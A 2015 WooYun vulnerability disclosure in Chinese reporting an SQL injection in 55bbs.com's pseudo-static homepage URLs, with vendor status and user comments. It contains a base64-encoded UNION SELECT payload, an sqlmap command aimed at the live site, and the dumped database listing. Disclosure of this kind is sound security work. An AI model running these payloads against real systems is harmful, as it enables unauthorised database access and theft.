当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139337

漏洞标题:我爱购物网首页伪静态SQL注入一处

相关厂商:55bbs.com

漏洞作者: F1uYu4n

提交时间:2015-09-06 16:48

修复时间:2015-09-11 16:50

公开时间:2015-09-11 16:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-06: 细节已通知厂商并且等待厂商处理中
2015-09-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

首页伪静态注入一处

详细说明:

存在问题的url:

http://www.55bbs.com/zixun/(*)/


这里*处内容需要base64编码

http://www.55bbs.com/zixun/JyB1bmlvbiBzZWxlY3QgY29uY2F0KHZlcnNpb24oKSwweDdjLHVzZXIoKSwweDdjLGRhdGFiYXNlKCkpIw==/


1111.jpg


可以直接上sqlmap

sqlmap -u "http://www.55bbs.com/zixun/(*)/" --dbms mysql --tamper base64encode.py -b --current-db --current-user


2222.jpg

漏洞证明:

available databases [12]:
[*] 55article
[*] 55baike
[*] 55product
[*] 55shangchang
[*] 55survey
[*] 55zt
[*] 55zt_bak
[*] Efficiency
[*] information_schema
[*] power
[*] ss
[*] test


虽然不是root权限,但也可以跨库查询

Database: 55article
[780 tables]


Database: ss
[410 tables]


Database: power
[106 tables]


Database: Efficiency
[1733 tables]


未深入

修复方案:

版权声明:转载请注明来源 F1uYu4n@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-11 16:50

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-09-07 21:35 | BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效,坚持好的习惯千万不要放弃)

    这个吊地哦啊

  2. 2015-09-11 18:47 | k0_pwn ( 路人 | Rank:2 漏洞数:2 | 专注二进制许多年,突然觉得web才好玩)

    这个竟然忽略。。这个伪静态注入点找的太牛逼。。膜拜

  3. 2015-09-12 13:10 | BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效,坚持好的习惯千万不要放弃)

    @k0_pwn 这位白帽子很吊哦,k开发人员估计吓尿了

  4. 2015-09-13 18:09 | k0_pwn ( 路人 | Rank:2 漏洞数:2 | 专注二进制许多年,突然觉得web才好玩)

    @BeenQuiver 昨天去看了一下漏洞还在,这是打算偷偷修复啊,还是不管了。。